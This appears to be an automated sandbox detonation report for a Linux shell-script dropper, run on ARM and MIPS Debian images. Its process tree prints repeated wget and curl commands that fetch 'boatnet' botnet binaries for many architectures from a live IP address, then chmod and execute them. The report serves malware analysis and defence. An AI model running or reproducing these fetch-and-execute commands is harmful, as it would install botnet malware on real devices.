| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-29 02:44
Reported
2024-10-29 02:48
Platform
debian9-armhf-20240611-en
Max time kernel
24s
Max time network
51s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/WTF | /tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh | N/A |
Processes
/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh
[/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mips]
/bin/cat
[cat boatnet.mips]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arc]
/bin/cat
[cat boatnet.arc]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i468]
/bin/cat
[cat boatnet.i468]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i686]
/bin/cat
[cat boatnet.i686]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]
/bin/cat
[cat boatnet.x86_64]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]
/bin/cat
[cat boatnet.mpsl]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm]
/bin/cat
[cat boatnet.arm]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm5]
/bin/cat
[cat boatnet.arm5]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm6]
/bin/cat
[cat boatnet.arm6]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm7]
/bin/cat
[cat boatnet.arm7]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.ppc]
/bin/cat
[cat boatnet.ppc]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.spc]
/bin/cat
[cat boatnet.spc]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.m68k]
/bin/cat
[cat boatnet.m68k]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.sh4]
/bin/cat
[cat boatnet.sh4]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-l5tVpU WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-29 02:44
Reported
2024-10-29 02:47
Platform
debian9-mipsbe-20240611-en
Max time kernel
92s
Max time network
96s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/WTF | /tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh | N/A |
Processes
/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh
[/tmp/9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-cCRIaL WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mips]
/bin/cat
[cat boatnet.mips]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-cCRIaL WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arc]
/bin/cat
[cat boatnet.arc]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-cCRIaL WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i468]
/bin/cat
[cat boatnet.i468]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh systemd-private-e6fbaed6b29d46d8a084638396a20df5-systemd-timedated.service-cCRIaL WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.i686]
/bin/cat
[cat boatnet.i686]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.x86_64]
/bin/cat
[cat boatnet.x86_64]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.mpsl]
/bin/cat
[cat boatnet.mpsl]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm]
/bin/cat
[cat boatnet.arm]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm5]
/bin/cat
[cat boatnet.arm5]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm6]
/bin/cat
[cat boatnet.arm6]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.arm7]
/bin/cat
[cat boatnet.arm7]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.ppc]
/bin/cat
[cat boatnet.ppc]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.spc]
/bin/cat
[cat boatnet.spc]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.m68k]
/bin/cat
[cat boatnet.m68k]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://154.216.19.166:3000/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://154.216.19.166:3000/hiddenbin/boatnet.sh4]
/bin/cat
[cat boatnet.sh4]
/bin/chmod
[chmod +x 9e559ea07d0bc4ba5a81b595a930b7d2805ad3597c7803449fadc5cdd491375b.sh WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp | |
| US | 154.216.19.166:3000 | tcp |